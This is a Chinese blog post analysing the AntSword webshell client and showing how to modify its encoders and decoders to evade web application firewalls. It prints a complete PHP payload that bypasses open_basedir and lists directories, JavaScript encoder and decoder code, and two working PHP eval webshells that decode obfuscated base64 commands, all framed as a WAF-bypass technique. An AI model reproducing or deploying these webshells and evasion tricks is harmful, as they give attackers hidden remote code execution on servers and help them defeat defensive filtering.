概述
总体从四个角度了解蚁剑工作机制
- 蚁剑发送的payload
- 解码器
- 编码器
- 请求包中的所有参数
蚁剑发送的payload
随机数字作为分界符,
发送前蚁剑客户端已生成
接收响应包时自动剔除
作用 : 防waf定位解码
主要函数:
- asenc()
$out是输出,传递$out是为了给输出编码,通过return传递给asoutput()函数
- asoutput()
通过$output = ob_get_contents(), 从缓冲区获取payload执行后的数据,经过asenc()编码然后输出
什么时候数据跑到缓冲区?
53行,ob_start();,打开缓冲区
77行:echo $M . $L;,将payload执行后的数据输出至缓冲区
该payload是目录获取payload,最后的$M.$L便是payload的执行结果
以下是payload代码
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
@array_push($oparr, $ocwd, sys_get_temp_dir());
foreach ($oparr as $item) {
if (!@is_writable($item)) {
continue;
}
$tmdir = $item . "/.bb5712d7460";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
$tmdir = realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", " /");
@rmdir($tmdir);
break;
}
}
function asenc($out)
{
return $out;
}
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "b031" . "2f345";
echo @asenc($output);
echo "594e" . "e92a";
}
ob_start();
try {
$D = base64_decode(substr($_POST["e17bb804eeb883"], 2));
$F = @opendir($D);
if ($F == NULL) {
echo("ERROR:// Path Not Found Or No Permission!");
} else {
$M = NULL;
$L = NULL;
while ($N = @readdir($F)) {
$P = $D . $N;
$T = @date("Y-m-d H:i:s", @filemtime($P));
@$E = substr(base_convert(@fileperms($P), 10, 8), -4);
$R = " " . $T . " " . @filesize($P) . " " . $E . " ";
if (@is_dir($P))
$M .= $N . " /" . $R;
else
$L .= $N . $R;
}
echo $M . $L;
@closedir($F);
}
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
}
asoutput();
die();解码器
双base64关键部分源码:
asoutput: () => {
return `function asenc($out){
return @base64_encode(base64_encode($out));
}
`.replace(/\n\s+/g, '');
},
decode_buff: (data, ext={}) => {
var fir_de_data = Buffer.from(data.toString(), 'base64');
var sec_de_data = Buffer.from(fir_de_data.toString(),'base64');
return sec_de_data;要注意的问题:
data中包含经过编码后的数据,
最终要解码并写入buffer对象中
tostring是让被解码后的二进制数据以字符串的形式表示好进行二次处理
两个重要函数:
- asoutput
- decode_buff
编码器
无论什么加密方式,都要传输两个变量给shell
- data['rondomID']
- data['pwd']
data['rondomID']中存储的是payload,需要对它进行编码或加密
data['pwd']中存储的是解密方法
也就是说,webshell中不含任何解密方法,加密payload和解密函数,都靠蚁剑将两者打包成参数进行发送
所以,如果要简单修改成双base64,主要修改这两个参数的值
请求包中的所有参数
并非所有参数都经过加密
比如传payload之前传的包含解密方法参数$_POST['cmd']
该步骤,只能webshell配合,也就是在webshell中把解码方法写上
蚁剑又是发送加密payload又是发送包含明文解密函数的参数,如果再对该参数进行加密,只有webshell完成该解密工作了
可采用的方法思路:
- 添加随机前缀后缀,模仿蚁剑返回包机制
- 进行编码或加密(冰蝎的AES加密,直接把密钥写webshell代码上,两个风险,1.密钥固定导致固定步骤经过加密的payload的密文都是一样的,2.密钥太容易泄露)
上代码
这样,不仅payload进行了处理,cmd参数也进行了处理,效果图如下:
成果:$cmd参数成功加密,webshell成功处理返回.
但对于的,webshell要加个base64解密
<?php @eval(base64_decode($_REQUEST['cmd'])); ?>或者,你可以采用添加随机前缀,就像经过解码器处理的返回包中一样.
要实现这个,需要对编码器和webshell进行小修改
<?php
$st = $_REQUEST['cmd'];
$sy = str_replace('npbsgsb','',$st);
$su = str_replace('xnzydsb,wndsg','',$sy);
@eval(base64_decode($su));
?>效果图如下:
参考链接:
蚁剑自定义编码器和解码器来bypass waf - darkless
如果不了解基本的给蚁剑设置代理,改useragent,referer等字段,蚁剑自带编码解码器分析,可参考:
4265
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
